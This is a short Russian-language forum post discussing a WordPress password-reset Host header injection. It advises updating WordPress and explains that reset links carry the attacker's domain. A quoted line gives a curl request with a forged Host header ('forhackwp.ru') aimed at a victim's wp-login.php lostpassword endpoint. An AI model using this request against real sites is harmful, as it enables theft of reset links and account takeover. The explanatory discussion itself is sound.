Показать сообщение отдельно

  #10  
Старый 06.11.2017, 02:48
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами: 5344886

Репутация: 441


По умолчанию

Цитата:
Сообщение от itprepod  

Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.
Совета по обновилению WP до последней версии, будет достаточно.

Цитата:
Сообщение от itprepod  

Или нет?
Нет. Письмо улетит админу, но в линках и заголовках будет домен атакующего.

Так же, должны быть соблюдены условия для успешной эксплуатации.

Цитата:
Сообщение от itprepod  

Как сделать HTTP запрос?
Цитата:
Сообщение от itprepod  

curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password"
http://тут-домен-жертвы/wp-login.php?action=lostpassword
 
Ответить с цитированием